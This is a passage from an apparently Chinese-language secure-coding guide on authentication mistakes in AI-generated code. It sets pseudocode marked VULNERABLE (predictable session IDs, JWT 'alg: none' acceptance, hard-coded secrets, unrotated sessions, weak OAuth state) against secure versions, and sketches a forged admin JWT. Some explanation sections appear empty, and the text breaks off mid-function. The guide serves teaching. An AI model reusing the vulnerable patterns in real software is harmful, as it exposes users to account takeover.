框架多样性:不同框架(Passport.js、Spring Security、Django、Rails Devise 等)的身份验证模式差异巨大。人工智能模型会将不同框架的模式混淆,生成既不适用于任何框架也不安全的混合代码。
无状态认证与有状态认证的混淆:向无状态认证(JWT)的转变导致训练数据中出现混合模式。人工智能经常将无状态令牌概念与有状态会话假设相结合,从而造成安全方面的逻辑漏洞。
边缘案例盲点:身份验证边缘案例(并发会话、密码重置流程、帐户恢复、多因素身份验证和 OAuth 状态管理)需要深入的安全思考,而人工智能模型无法可靠地产生这些思考。
影响统计数据:
// VULNERABLE: Minimal password requirements
function validatePassword(password):
if length(password) < 6:
return false
return true
// VULNERABLE: Only checks length, no complexity
function registerUser(email, password):
if length(password) >= 8: // "Strong enough"
hashedPassword = hashPassword(password)
createUser(email, hashedPassword)
return success
return error("Password too short")
// VULNERABLE: Pattern allows easy-to-guess passwords
function isValidPassword(password):
// Only requires one of each - easily satisfied by "Password1!"
hasUpper = containsUppercase(password)
hasLower = containsLowercase(password)
hasNumber = containsNumber(password)
hasSpecial = containsSpecialChar(password)
if hasUpper and hasLower and hasNumber and hasSpecial:
return true
return false
// Missing: dictionary check, common password check, breach check
为什么这样做很危险:
// VULNERABLE: Sequential session IDs
sessionCounter = 1000
function generateSessionId():
sessionCounter = sessionCounter + 1
return "session_" + toString(sessionCounter)
// VULNERABLE: Time-based session generation
function createSessionToken():
timestamp = getCurrentTimestamp()
return "sess_" + toString(timestamp)
// VULNERABLE: Weak random source
function generateToken():
return "token_" + toString(randomInteger(0, 999999))
// VULNERABLE: MD5 of predictable data
function createAuthToken(userId):
timestamp = getCurrentTimestamp()
return md5(toString(userId) + toString(timestamp))
// VULNERABLE: User-controlled seed
function generateSessionId(userId, email):
seed = userId + email + getCurrentDate()
return sha256(seed) // Deterministic - same inputs = same output
为什么这样做很危险:
// VULNERABLE: Session ID not regenerated after login
function login(request):
email = request.body.email
password = request.body.password
user = findUserByEmail(email)
if user and verifyPassword(password, user.hashedPassword):
// Using the SAME session ID from before authentication
request.session.userId = user.id
request.session.authenticated = true
return redirect("/dashboard")
return error("Invalid credentials")
// VULNERABLE: Accepting session ID from URL parameter
function handleRequest(request):
sessionId = request.query.sessionId or request.cookies.sessionId
// Attacker can send victim: https://app.com/login?sessionId=attacker_controlled_session
session = loadSession(sessionId)
// VULNERABLE: Not invalidating session on privilege change
function promoteToAdmin(request):
user = getCurrentUser(request)
user.role = "admin"
user.save()
// Same session continues - if session was compromised before,
// attacker now has admin access
return success("You are now an admin")
为什么这样做很危险:
// VULNERABLE: Decoding JWT without algorithm verification
function verifyJwt(token):
parts = token.split(".")
header = base64Decode(parts[0])
payload = base64Decode(parts[1])
// Trusting the algorithm from the token header itself!
algorithm = header.alg
if algorithm == "none":
return payload // No signature check!
signature = parts[2]
if verifySignature(payload, signature, algorithm):
return payload
return null
// VULNERABLE: Using jwt library without specifying expected algorithm
function validateToken(token):
try:
// Library may accept 'none' algorithm if token specifies it
decoded = jwt.decode(token, secretKey)
return decoded
catch:
return null
// VULNERABLE: Allowing multiple algorithms including none
function verifyToken(token, secret):
options = {
algorithms: ["HS256", "HS384", "HS512", "none"] // DANGEROUS
}
return jwt.verify(token, secret, options)
为什么这样做很危险:
alg: "none"并移除签名。漏洞利用示例:
// Original legitimate token:
// Header: {"alg":"HS256","typ":"JWT"}
// Payload: {"sub":"1234","role":"user"}
// Signature: valid_signature_here
// Attacker-modified token:
// Header: {"alg":"none","typ":"JWT"} ← Changed to "none"
// Payload: {"sub":"1234","role":"admin"} ← Changed to admin
// Signature: (empty) ← Removed
// If server trusts header.alg, this forged token is accepted as valid
// VULNERABLE: Short/guessable secret
JWT_SECRET = "secret"
// VULNERABLE: Common secrets from tutorials
JWT_SECRET = "your-256-bit-secret"
JWT_SECRET = "supersecretkey"
JWT_SECRET = "jwt-secret-key"
// VULNERABLE: Empty or null secret
function createToken(payload):
secret = getConfig("JWT_SECRET") or "" // Falls back to empty string
return jwt.sign(payload, secret, {algorithm: "HS256"})
// VULNERABLE: Secret derived from predictable data
function getJwtSecret():
return sha256(APPLICATION_NAME + "-" + ENVIRONMENT)
// If attacker knows app name and environment, they can derive the secret
// VULNERABLE: Same secret for signing and encryption
JWT_SECRET = "shared_secret_for_everything"
function signToken(payload):
return jwt.sign(payload, JWT_SECRET)
function encryptData(data):
return aesEncrypt(data, JWT_SECRET) // Key reuse vulnerability
为什么这样做很危险:
// VULNERABLE: Storing JWT in localStorage
function handleLoginResponse(response):
accessToken = response.data.accessToken
refreshToken = response.data.refreshToken
// localStorage is accessible to ANY JavaScript on the page
localStorage.setItem("access_token", accessToken)
localStorage.setItem("refresh_token", refreshToken)
// Also stored user data in localStorage
localStorage.setItem("user", JSON.stringify(response.data.user))
// VULNERABLE: Retrieving token for API calls
function apiRequest(endpoint, data):
token = localStorage.getItem("access_token")
return fetch(endpoint, {
headers: {
"Authorization": "Bearer " + token
},
body: JSON.stringify(data)
})
// VULNERABLE: Token in sessionStorage (same problem)
function storeToken(token):
sessionStorage.setItem("jwt", token)
为什么这样做很危险:
// VULNERABLE: JWT without expiration
function createUserToken(user):
payload = {
userId: user.id,
email: user.email,
role: user.role
// No "exp" claim!
}
return jwt.sign(payload, JWT_SECRET)
// VULNERABLE: Extremely long expiration
function generateToken(user):
payload = {
sub: user.id,
iat: now(),
exp: now() + (365 * 24 * 60 * 60) // 1 year expiration
}
return jwt.sign(payload, JWT_SECRET)
// VULNERABLE: Trusting token-provided expiration without server check
function validateToken(token):
decoded = jwt.verify(token, JWT_SECRET)
// JWT library checks exp, but server has no session to revoke
// Compromised tokens valid until natural expiration
return decoded
// VULNERABLE: No mechanism to invalidate tokens
function logout(request):
response.clearCookie("token")
return success("Logged out")
// Token is still valid! Anyone with the token can still use it
为什么这样做很危险:
// SECURE: Comprehensive password validation
import commonPasswordList from "common-passwords-database"
import breachedPasswordApi from "haveibeenpwned-api"
function validatePasswordStrength(password):
errors = []
// Minimum length (NIST recommends 8+, many orgs use 12+)
if length(password) < 12:
errors.push("Password must be at least 12 characters")
// Maximum length (prevent DoS from hashing extremely long passwords)
if length(password) > 128:
errors.push("Password cannot exceed 128 characters")
// Check against common password list (10,000+ passwords)
if password.toLowerCase() in commonPasswordList:
errors.push("This password is too common")
// Check against user-specific data (optional but recommended)
// - Don't allow email prefix as password
// - Don't allow username as password
// Check against breached passwords (Have I Been Pwned API)
if await checkBreachedPassword(password):
errors.push("This password has appeared in a data breach")
if length(errors) > 0:
return { valid: false, errors: errors }
return { valid: true, errors: [] }
// SECURE: Check breached passwords using k-anonymity (no password exposure)
async function checkBreachedPassword(password):
// Hash password with SHA-1 (HIBP API requirement)
hash = sha1(password).toUpperCase()
prefix = hash.substring(0, 5)
suffix = hash.substring(5)
// Only send first 5 characters - k-anonymity preserves privacy
response = await fetch("https://api.pwnedpasswords.com/range/" + prefix)
hashes = response.text()
// Check if our suffix appears in the returned hashes
for line in hashes.split("\n"):
parts = line.split(":")
if parts[0] == suffix:
return true // Password has been breached
return false
// SECURE: Password hashing with proper algorithm
function hashPassword(password):
// bcrypt with cost factor of 12 (adjust based on hardware)
// Alternatively: argon2id with recommended parameters
return bcrypt.hash(password, 12)
function verifyPassword(password, hash):
return bcrypt.compare(password, hash)
为什么说它是安全的:
// SECURE: Cryptographically random session IDs
import cryptoRandom from "secure-random-library"
function generateSessionId():
// 256 bits of cryptographically secure randomness
// Represented as 64 hex characters
randomBytes = cryptoRandom.getRandomBytes(32)
return bytesToHex(randomBytes)
// SECURE: Session creation with proper attributes
function createSession(userId):
sessionId = generateSessionId()
sessionData = {
id: sessionId,
userId: userId,
createdAt: now(),
expiresAt: now() + SESSION_DURATION, // e.g., 24 hours
lastActivityAt: now(),
ipAddress: getClientIP(),
userAgent: getUserAgent()
}
// Store in server-side session store (Redis, database, etc.)
sessionStore.save(sessionId, sessionData)
return sessionId
// SECURE: Session ID regeneration after authentication
function login(request):
email = request.body.email
password = request.body.password
user = findUserByEmail(email)
if not user:
return error("Invalid credentials") // Don't reveal if email exists
if not verifyPassword(password, user.hashedPassword):
recordFailedLogin(user.id, getClientIP())
return error("Invalid credentials")
// CRITICAL: Destroy old session and create new one
if request.session.id:
sessionStore.delete(request.session.id)
// Generate completely new session ID after authentication
newSessionId = createSession(user.id)
// Set session cookie with secure attributes
response.setCookie("session_id", newSessionId, {
httpOnly: true, // Prevent XSS access
secure: true, // HTTPS only
sameSite: "Strict", // CSRF protection
path: "/",
maxAge: SESSION_DURATION
})
return redirect("/dashboard")
// SECURE: Session regeneration on privilege change
function changeUserRole(request, newRole):
user = getCurrentUser(request)
// Change the role
user.role = newRole
user.save()
// Regenerate session to bind new privileges to fresh session
oldSessionId = request.cookies.session_id
sessionStore.delete(oldSessionId)
newSessionId = createSession(user.id)
response.setCookie("session_id", newSessionId, {
httpOnly: true,
secure: true,
sameSite: "Strict"
})
return success("Role updated")
为什么说它是安全的:
// SECURE: JWT configuration with strict settings
JWT_CONFIG = {
secret: getEnv("JWT_SECRET"), // 256+ bit secret from environment
algorithms: ["HS256"], // Single allowed algorithm - explicit!
issuer: "myapp.example.com",
audience: "myapp-users",
expiresIn: "15m" // Short-lived access tokens
}
// SECURE: Token creation with explicit claims
function createAccessToken(user):
payload = {
sub: toString(user.id),
email: user.email,
role: user.role,
iss: JWT_CONFIG.issuer,
aud: JWT_CONFIG.audience,
iat: now(),
exp: now() + (15 * 60), // 15 minutes
jti: generateUUID() // Unique token ID for revocation
}
return jwt.sign(payload, JWT_CONFIG.secret, {
algorithm: "HS256" // Explicit algorithm
})
// SECURE: Token verification with all claims checked
function verifyAccessToken(token):
try:
decoded = jwt.verify(token, JWT_CONFIG.secret, {
algorithms: ["HS256"], // ONLY accept HS256
issuer: JWT_CONFIG.issuer,
audience: JWT_CONFIG.audience,
complete: true // Return header + payload
})
// Additional validation
if not decoded.payload.sub:
return { valid: false, error: "Missing subject" }
if not decoded.payload.role:
return { valid: false, error: "Missing role" }
// Check against token blacklist (for logout/revocation)
if await isTokenRevoked(decoded.payload.jti):
return { valid: false, error: "Token revoked" }
return { valid: true, payload: decoded.payload }
catch JwtExpiredError:
return { valid: false, error: "Token expired" }
catch JwtInvalidError as e:
return { valid: false, error: "Invalid token: " + e.message }
// SECURE: Refresh token handling
function createRefreshToken(user, sessionId):
payload = {
sub: toString(user.id),
sid: sessionId, // Bind to session for revocation
type: "refresh",
iat: now(),
exp: now() + (7 * 24 * 60 * 60) // 7 days
}
token = jwt.sign(payload, JWT_CONFIG.secret + "_refresh", {
algorithm: "HS256"
})
// Store refresh token hash in database for revocation
tokenHash = sha256(token)
storeRefreshToken(user.id, sessionId, tokenHash, payload.exp)
return token
// SECURE: Refresh flow with rotation
function refreshAccessToken(refreshToken):
try:
decoded = jwt.verify(refreshToken, JWT_CONFIG.secret + "_refresh", {
algorithms: ["HS256"]
})
// Verify refresh token is still valid in database
tokenHash = sha256(refreshToken)
storedToken = getRefreshToken(decoded.sub, tokenHash)
if not storedToken or storedToken.revoked:
return { error: "Refresh token invalid or revoked" }
// Rotate refresh token (issue new one, revoke old)
revokeRefreshToken(tokenHash)
user = findUserById(decoded.sub)
newAccessToken = createAccessToken(user)
newRefreshToken = createRefreshToken(user, decoded.sid)
return {
accessToken: newAccessToken,
refreshToken: newRefreshToken
}
catch:
return { error: "Invalid refresh token" }
为什么说它是安全的:
// SECURE: Cookie-based session with proper attributes
function setSessionCookie(response, sessionId):
response.setCookie("session_id", sessionId, {
httpOnly: true, // Cannot be accessed via JavaScript
secure: true, // Only sent over HTTPS
sameSite: "Strict", // Not sent with cross-site requests
path: "/", // Available for all paths
domain: ".myapp.com", // Scoped to main domain and subdomains
maxAge: 24 * 60 * 60 // 24 hours in seconds
})
// SECURE: JWT in cookie (not localStorage)
function setAuthCookies(response, accessToken, refreshToken):
// Access token - short lived, same-site strict
response.setCookie("access_token", accessToken, {
httpOnly: true,
secure: true,
sameSite: "Strict",
path: "/",
maxAge: 15 * 60 // 15 minutes
})
// Refresh token - limited path to reduce exposure
response.setCookie("refresh_token", refreshToken, {
httpOnly: true,
secure: true,
sameSite: "Strict",
path: "/auth/refresh", // Only sent to refresh endpoint
maxAge: 7 * 24 * 60 * 60 // 7 days
})
// SECURE: Cookie cleanup on logout
function clearAuthCookies(response):
// Set cookies with immediate expiration
response.setCookie("access_token", "", {
httpOnly: true,
secure: true,
sameSite: "Strict",
path: "/",
maxAge: 0 // Immediate expiration
})
response.setCookie("refresh_token", "", {
httpOnly: true,
secure: true,
sameSite: "Strict",
path: "/auth/refresh",
maxAge: 0
})
// SECURE: SameSite considerations for cross-origin needs
function setCookieForOAuth(response, stateToken):
// OAuth requires cookies to work across redirects
// Use Lax instead of Strict when necessary
response.setCookie("oauth_state", stateToken, {
httpOnly: true,
secure: true,
sameSite: "Lax", // Allows top-level navigation
path: "/auth/callback",
maxAge: 10 * 60 // 10 minutes for OAuth flow
})
为什么说它是安全的:
// SECURE: Complete token refresh implementation
class AuthenticationService:
ACCESS_TOKEN_DURATION = 15 * 60 // 15 minutes
REFRESH_TOKEN_DURATION = 7 * 24 * 60 * 60 // 7 days
REFRESH_TOKEN_REUSE_WINDOW = 60 // 1 minute grace period
function login(email, password):
user = validateCredentials(email, password)
if not user:
return { error: "Invalid credentials" }
// Create session for tracking
session = createSession(user.id)
// Generate token pair
accessToken = createAccessToken(user)
refreshToken = createRefreshToken(user, session.id)
return {
accessToken: accessToken,
refreshToken: refreshToken,
expiresIn: ACCESS_TOKEN_DURATION
}
function refresh(refreshToken):
// Validate refresh token
decoded = verifyRefreshToken(refreshToken)
if not decoded.valid:
return { error: decoded.error }
// Check token in database
tokenRecord = getRefreshTokenRecord(decoded.jti)
if not tokenRecord:
// Token doesn't exist - possible theft, invalidate session
invalidateSessionTokens(decoded.sid)
return { error: "Invalid refresh token" }
if tokenRecord.revoked:
// Reuse of revoked token - likely theft
// Revoke ALL tokens for this session
invalidateSessionTokens(decoded.sid)
logSecurityEvent("Refresh token reuse detected", decoded.sub)
return { error: "Security violation detected" }
if tokenRecord.usedAt:
// Token was already used - check if within grace period
if now() - tokenRecord.usedAt > REFRESH_TOKEN_REUSE_WINDOW:
// Outside grace period - potential theft
invalidateSessionTokens(decoded.sid)
return { error: "Refresh token already used" }
// Within grace period - return same tokens (replay protection)
return tokenRecord.lastIssuedTokens
// Mark token as used
tokenRecord.usedAt = now()
tokenRecord.save()
// Generate new token pair (rotation)
user = findUserById(decoded.sub)
newAccessToken = createAccessToken(user)
newRefreshToken = createRefreshToken(user, decoded.sid)
// Store new tokens for replay protection
tokenRecord.lastIssuedTokens = {
accessToken: newAccessToken,
refreshToken: newRefreshToken
}
tokenRecord.save()
// Revoke old refresh token (after grace period, it's invalid)
scheduleTokenRevocation(decoded.jti, REFRESH_TOKEN_REUSE_WINDOW)
return {
accessToken: newAccessToken,
refreshToken: newRefreshToken,
expiresIn: ACCESS_TOKEN_DURATION
}
function logout(accessToken, refreshToken):
// Revoke access token (add to blacklist until expiry)
decoded = decodeToken(accessToken)
if decoded:
blacklistToken(decoded.jti, decoded.exp)
// Revoke refresh token immediately
refreshDecoded = decodeToken(refreshToken)
if refreshDecoded:
revokeRefreshToken(refreshDecoded.jti)
// Optionally invalidate entire session
if refreshDecoded and refreshDecoded.sid:
invalidateSession(refreshDecoded.sid)
return { success: true }
function logoutAll(userId):
// Invalidate all sessions for user (password change, security concern)
sessions = getSessionsForUser(userId)
for session in sessions:
invalidateSessionTokens(session.id)
deleteSession(session.id)
return { success: true, sessionsInvalidated: length(sessions) }
为什么说它是安全的:
// SECURE: Complete logout implementation
function logout(request):
// Get current session/tokens
accessToken = request.cookies.access_token
refreshToken = request.cookies.refresh_token
sessionId = request.session.id
// Revoke access token (add to blacklist)
if accessToken:
decoded = decodeToken(accessToken)
if decoded:
// Add to Redis/cache blacklist with TTL matching token expiry
blacklistToken(decoded.jti, decoded.exp - now())
// Revoke refresh token in database
if refreshToken:
refreshDecoded = decodeToken(refreshToken)
if refreshDecoded:
markRefreshTokenRevoked(refreshDecoded.jti)
// Delete server-side session
if sessionId:
sessionStore.delete(sessionId)
// Clear client cookies
response = new Response()
clearAuthCookies(response)
return response.redirect("/login")
// SECURE: Token blacklist with automatic expiry
class TokenBlacklist:
// Use Redis or similar with TTL support
function add(tokenId, ttlSeconds):
redis.setex("blacklist:" + tokenId, ttlSeconds, "revoked")
function isBlacklisted(tokenId):
return redis.exists("blacklist:" + tokenId)
// SECURE: Middleware to check token validity
function authMiddleware(request, next):
accessToken = request.cookies.access_token
if not accessToken:
return redirect("/login")
decoded = verifyAccessToken(accessToken)
if not decoded.valid:
return redirect("/login")
// Check blacklist
if tokenBlacklist.isBlacklisted(decoded.payload.jti):
return redirect("/login")
// Token is valid and not revoked
request.user = decoded.payload
return next(request)
// SECURE: Logout from all sessions
function logoutAllSessions(request):
userId = request.user.sub
// Get all active sessions for user
sessions = sessionStore.findByUserId(userId)
// Revoke all refresh tokens
refreshTokens = getRefreshTokensForUser(userId)
for token in refreshTokens:
markRefreshTokenRevoked(token.jti)
// Delete all sessions
for session in sessions:
sessionStore.delete(session.id)
// Add all user's recent access tokens to blacklist
// This requires tracking issued tokens or using short expiry
invalidateAllAccessTokensForUser(userId)
return success("Logged out from all devices")
为什么说它是安全的:
// VULNERABLE: Race condition in login attempts
function login(email, password):
user = findUserByEmail(email)
failedAttempts = getFailedAttempts(email)
if failedAttempts >= MAX_ATTEMPTS:
return error("Account locked")
// Race condition: two requests check simultaneously,
// both see failedAttempts = 4, both proceed
if not verifyPassword(password, user.hashedPassword):
incrementFailedAttempts(email) // Not atomic!
return error("Invalid credentials")
resetFailedAttempts(email)
return success()
// SECURE: Atomic rate limiting
function loginWithAtomicRateLimit(email, password):
// Atomic increment and check in single operation
result = redis.eval(`
local attempts = redis.call('INCR', KEYS[1])
if attempts == 1 then
redis.call('EXPIRE', KEYS[1], 900) -- 15 minute window
end
return attempts
`, ["login_attempts:" + email])
if result > MAX_ATTEMPTS:
return error("Too many attempts. Try again later.")
user = findUserByEmail(email)
if not user or not verifyPassword(password, user.hashedPassword):
return error("Invalid credentials")
// Reset on success
redis.del("login_attempts:" + email)
return success()
// VULNERABLE: Race condition in concurrent session check
function login(email, password, request):
user = authenticate(email, password)
activeSessions = countActiveSessions(user.id)
if activeSessions >= MAX_SESSIONS:
return error("Too many active sessions")
// Race: two logins pass the check simultaneously
createSession(user.id) // Now user has MAX_SESSIONS + 1
return success()
// SECURE: Use database constraints or atomic operations
function loginWithSessionLimit(email, password, request):
user = authenticate(email, password)
// Use transaction with row lock
transaction.start()
try:
activeSessions = countActiveSessionsForUpdate(user.id) // SELECT FOR UPDATE
if activeSessions >= MAX_SESSIONS:
transaction.rollback()
return error("Too many sessions")
createSession(user.id)
transaction.commit()
return success()
catch:
transaction.rollback()
throw
// VULNERABLE: Early return reveals password length information
function verifyPassword_vulnerable(input, stored):
if length(input) != length(stored):
return false // Fast return reveals length mismatch
for i in range(length(input)):
if input[i] != stored[i]:
return false // Fast return reveals first different character
return true
// VULNERABLE: String comparison has timing differences
function checkPassword_vulnerable(password, hash):
computedHash = sha256(password)
return computedHash == hash // == operator may short-circuit
// SECURE: Constant-time comparison
function constantTimeEquals(a, b):
if length(a) != length(b):
// Still need length check, but make it constant-time
b = b + repeat("\0", max(0, length(a) - length(b)))
a = a + repeat("\0", max(0, length(b) - length(a)))
result = 0
for i in range(length(a)):
result = result | (charCode(a[i]) ^ charCode(b[i]))
return result == 0
// SECURE: Use library-provided constant-time comparison
function verifyPassword_secure(password, hashedPassword):
// bcrypt.compare is designed to be constant-time
return bcrypt.compare(password, hashedPassword)
// SECURE: Use crypto library's timingSafeEqual
function verifyHash(input, expected):
inputHash = sha256(input)
return crypto.timingSafeEqual(
Buffer.from(inputHash, 'hex'),
Buffer.from(expected, 'hex')
)
// VULNERABLE: Predictable reset token
function createResetToken_vulnerable(userId):
token = md5(toString(userId) + toString(now()))
expiry = now() + (60 * 60) // 1 hour
saveResetToken(userId, token, expiry)
return token
// VULNERABLE: Token doesn't expire on use
function resetPassword_vulnerable(token, newPassword):
resetRecord = getResetToken(token)
if resetRecord and resetRecord.expiry > now():
user = findUserById(resetRecord.userId)
user.hashedPassword = hashPassword(newPassword)
user.save()
// Token not invalidated! Can be reused
return success()
return error("Invalid token")
// VULNERABLE: Token not invalidated on password change
function changePassword(userId, oldPassword, newPassword):
user = findUserById(userId)
if verifyPassword(oldPassword, user.hashedPassword):
user.hashedPassword = hashPassword(newPassword)
user.save()
// Existing reset tokens still valid!
return success()
return error("Wrong password")
// SECURE: Complete password reset implementation
function createResetToken_secure(userId):
// Generate cryptographically random token
token = generateSecureRandom(32) // 256 bits
tokenHash = sha256(token) // Store hash, not token
expiry = now() + (15 * 60) // 15 minutes
// Invalidate any existing reset tokens
deleteResetTokensForUser(userId)
// Store hashed token
saveResetToken(userId, tokenHash, expiry)
// Return plaintext token for email (store hash only)
return token
function resetPassword_secure(token, newPassword):
tokenHash = sha256(token)
resetRecord = getResetTokenByHash(tokenHash)
if not resetRecord:
return error("Invalid token")
if resetRecord.expiry < now():
deleteResetToken(tokenHash)
return error("Token expired")
if resetRecord.used:
return error("Token already used")
// Validate new password strength
validation = validatePasswordStrength(newPassword)
if not validation.valid:
return error(validation.errors)
user = findUserById(resetRecord.userId)
// Update password
user.hashedPassword = hashPassword(newPassword)
user.passwordChangedAt = now()
user.save()
// Mark token as used (or delete)
resetRecord.used = true
resetRecord.save()
// Invalidate all existing sessions
invalidateAllSessionsForUser(user.id)
// Invalidate all refresh tokens
revokeAllRefreshTokensForUser(user.id)
// Send notification email
sendPasswordChangedNotification(user.email)
return success()
// VULNERABLE: No state parameter - CSRF possible
function initiateOAuth_vulnerable():
redirectUrl = OAUTH_PROVIDER_URL +
"?client_id=" + CLIENT_ID +
"&redirect_uri=" + CALLBACK_URL +
"&scope=email profile"
return redirect(redirectUrl)
// VULNERABLE: Predictable state
function initiateOAuth_weakState():
state = toString(now()) // Predictable!
storeState(state)
redirectUrl = OAUTH_PROVIDER_URL +
"?client_id=" + CLIENT_ID +
"&state=" + state +
"&redirect_uri=" + CALLBACK_URL
return redirect(redirectUrl)
// VULNERABLE: State not validated on callback
function handleCallback_vulnerable(request):
code = request.query.code
// state parameter ignored!
tokens = exchangeCodeForTokens(code)
return loginWithTokens(tokens)
// VULNERABLE: State reuse possible
function handleCallback_reuseVulnerable(request):
code = request.query.code
state = request.query.state
if isValidState(state): // Just checks if it exists
// Doesn't delete/invalidate state after use
tokens = exchangeCodeForTokens(code)
return loginWithTokens(tokens)
return error("Invalid state")
// SECURE: Complete OAuth implementation
function initiateOAuth_secure(request):
// Generate random state
state = generateSecureRandom(32)
// Bind state to user's session (CSRF protection)
request.session.oauthState = state
request.session.oauthStateCreatedAt = now()
// Optional: include nonce for ID token validation
nonce = generateSecureRandom(32)
request.session.oauthNonce = nonce
redirectUrl = OAUTH_PROVIDER_URL +
"?client_id=" + CLIENT_ID +
"&response_type=code" +
"&redirect_uri=" + encodeURIComponent(CALLBACK_URL) +
"&scope=" + encodeURIComponent("openid email profile") +
"&state=" + state +
"&nonce=" + nonce
return redirect(redirectUrl)
function handleCallback_secure(request):
code = request.query.code
state = request.query.state
error = request.query.error
// Check for OAuth error
if error:
logOAuthError(error, request.query.error_description)
return redirect("/login?error=oauth_failed")
// Validate state
if not state:
return error("Missing state parameter")
storedState = request.session.oauthState
stateCreatedAt = request.session.oauthStateCreatedAt
// Constant-time comparison
if not constantTimeEquals(state, storedState):
logSecurityEvent("OAuth state mismatch", request)
return error("Invalid state")
// Check state expiry (5 minutes)
if now() - stateCreatedAt > 300:
return error("OAuth session expired")
// Clear state immediately (one-time use)
delete request.session.oauthState
delete request.session.oauthStateCreatedAt
// Exchange code for tokens
tokenResponse = await exchangeCodeForTokens(code, CALLBACK_URL)
if not tokenResponse.id_token:
return error("Missing ID token")
// Validate ID token
idToken = verifyIdToken(tokenResponse.id_token, {
audience: CLIENT_ID,
nonce: request.session.oauthNonce // Verify nonce
})
delete request.session.oauthNonce
if not idToken.valid:
return error("Invalid ID token")
// Create or update user
user = findOrCreateUserFromOAuth(idToken.payload)
// Create session with new session ID
createAuthenticatedSession(request, user)
return redirect("/dashboard")
// VULNERABLE: Trusting unverified token payload
function getUserFromToken_vulnerable(token):
// Decodes token WITHOUT verification
decoded = base64Decode(token.split(".")[1])
payload = JSON.parse(decoded)
// Trusting the user ID from unverified payload!
return findUserById(payload.sub)
// VULNERABLE: Verifying signature but using wrong data source
function getUser_vulnerable(request):
token = request.headers.authorization.replace("Bearer ", "")
// Verify the token (good)
isValid = jwt.verify(token, secret)
if isValid:
// But then extract user from request body (bad!)
userId = request.body.userId
return findUserById(userId)
// SECURE: Always use verified payload
function getUserFromToken_secure(token):
try:
// Verify and decode in one operation
decoded = jwt.verify(token, secret, { algorithms: ["HS256"] })
// Use the verified payload, not a separate data source
return findUserById(decoded.sub)
catch:
return null
// SECURE: Middleware that sets verified user
function authMiddleware(request, next):
token = extractTokenFromRequest(request)
if not token:
return unauthorized()
try:
verified = jwt.verify(token, secret, {
algorithms: ["HS256"],
issuer: "myapp"
})
// Set user from VERIFIED token only
request.user = {
id: verified.sub,
email: verified.email,
role: verified.role
}
return next()
catch:
return unauthorized()
// VULNERABLE: Password change doesn't invalidate sessions
function changePassword_vulnerable(request, oldPassword, newPassword):
user = request.user
if verifyPassword(oldPassword, user.hashedPassword):
user.hashedPassword = hashPassword(newPassword)
user.save()
return success("Password changed")
return error("Wrong password")
// Existing sessions remain valid! Attacker still logged in
// VULNERABLE: Role change doesn't update session
function demoteUser_vulnerable(userId):
user = findUserById(userId)
user.role = "basic"
user.save()
// User's existing sessions still have old role!
return success()
// SECURE: Invalidate sessions on security-sensitive changes
function changePassword_secure(request, oldPassword, newPassword):
user = request.user
if not verifyPassword(oldPassword, user.hashedPassword):
return error("Wrong password")
// Update password
user.hashedPassword = hashPassword(newPassword)
user.passwordChangedAt = now()
user.save()
// Invalidate ALL sessions except current (or including current)
currentSessionId = request.session.id
sessions = getAllSessionsForUser(user.id)
for session in sessions:
if session.id != currentSessionId: // Keep current or invalidate all
deleteSession(session.id)
// Revoke all refresh tokens
revokeAllRefreshTokensForUser(user.id)
// Optional: Force re-authentication
regenerateSession(request)
return success("Password changed. Other sessions logged out.")
// SECURE: Track password change timestamp in tokens
function validateToken_withPasswordCheck(token):
decoded = jwt.verify(token, secret)
user = findUserById(decoded.sub)
// Check if token was issued before password change
if decoded.iat < user.passwordChangedAt:
return { valid: false, error: "Password changed since token issued" }
return { valid: true, payload: decoded }
// VULNERABLE: Using Lax when Strict is needed
function setSessionCookie_wrongSameSite(response, sessionId):
response.setCookie("session_id", sessionId, {
httpOnly: true,
secure: true,
sameSite: "Lax" // Allows cookie on top-level navigation
// Attacker can CSRF via: <a href="https://bank.com/transfer?to=attacker">
})
// VULNERABLE: Omitting SameSite (defaults vary by browser)
function setSessionCookie_noSameSite(response, sessionId):
response.setCookie("session_id", sessionId, {
httpOnly: true,
secure: true
// SameSite not specified - browser-dependent behavior
})
// VULNERABLE: Using None without understanding implications
function setSessionCookie_sameNone(response, sessionId):
response.setCookie("session_id", sessionId, {
httpOnly: true,
secure: true,
sameSite: "None" // Sent on ALL cross-site requests - CSRF vulnerable!
})
// GUIDE: When to use each SameSite value
// STRICT: Most secure, use for sensitive auth cookies
// - Cookie NOT sent on any cross-site request
// - User clicking link from email to your site won't be logged in
// - Best for: Banking, admin panels, security-critical apps
function setStrictCookie(response, sessionId):
response.setCookie("session_id", sessionId, {
httpOnly: true,
secure: true,
sameSite: "Strict"
})
// LAX: Balance of security and usability
// - Cookie sent on top-level navigation (clicking links)
// - NOT sent on cross-site POST, images, iframes
// - Good for: General user sessions where link-sharing matters
// - STILL NEED CSRF tokens for POST/PUT/DELETE endpoints!
function setLaxCookie(response, sessionId):
response.setCookie("session_id", sessionId, {
httpOnly: true,
secure: true,
sameSite: "Lax"
})
// Additional CSRF protection still recommended
// NONE: Only for cross-site embedding needs
// - Cookie sent on ALL requests including cross-site
// - REQUIRES Secure attribute (HTTPS only)
// - Only use for: OAuth flows, embedded widgets, intentional cross-site
function setNoneCookie_onlyWhenNeeded(response, oauthToken):
response.setCookie("oauth_continuation", oauthToken, {
httpOnly: true,
secure: true, // REQUIRED with SameSite=None
sameSite: "None",
maxAge: 300 // Short-lived for specific purpose
})
// SECURE: Complete security headers for authentication
function setSecurityHeaders(response):
// Prevent clickjacking (don't allow embedding in frames)
response.setHeader("X-Frame-Options", "DENY")
// Modern clickjacking protection
response.setHeader("Content-Security-Policy",
"default-src 'self'; " +
"script-src 'self'; " +
"style-src 'self' 'unsafe-inline'; " +
"frame-ancestors 'none'; " +
"form-action 'self'"
)
// Prevent MIME type sniffing
response.setHeader("X-Content-Type-Options", "nosniff")
// Enable browser XSS filter (legacy, CSP is better)
response.setHeader("X-XSS-Protection", "1; mode=block")
// Only allow HTTPS
response.setHeader("Strict-Transport-Security",
"max-age=31536000; includeSubDomains; preload"
)
// Control referrer information
response.setHeader("Referrer-Policy", "strict-origin-when-cross-origin")
// Disable feature policies for sensitive features
response.setHeader("Permissions-Policy",
"geolocation=(), camera=(), microphone=(), payment=()"
)
// Cache control for authenticated pages
response.setHeader("Cache-Control",
"no-store, no-cache, must-revalidate, private"
)
response.setHeader("Pragma", "no-cache")
response.setHeader("Expires", "0")
// SECURE: Login page specific headers
function setLoginPageHeaders(response):
setSecurityHeaders(response)
// Additional login protection
response.setHeader("Content-Security-Policy",
"default-src 'self'; " +
"script-src 'self'; " +
"style-src 'self'; " +
"form-action 'self'; " + // Forms only submit to same origin
